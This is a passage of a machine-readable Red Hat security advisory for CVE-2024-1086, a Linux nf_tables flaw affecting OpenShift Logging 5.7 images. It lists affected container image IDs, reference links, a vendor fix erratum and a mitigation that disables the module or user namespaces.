"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1086"
},
{
"category": "external",
"summary": "RHBZ#2262126",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262126"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2024-01-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "1. This flaw can be mitigated by preventing the affected netfilter (nf_tables) kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.\n\n2. If the module cannot be disabled, on non-containerized deployments of Red Hat Enterprise Linux, the mitigation is to disable user namespaces:\n```\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n```\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use the second mitigation (disabling user namespaces) as the functionality is needed to be enabled. The first mitigation (blacklisting nf_tables) is still viable for containerized deployments, providing the environment is not using netfilter.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
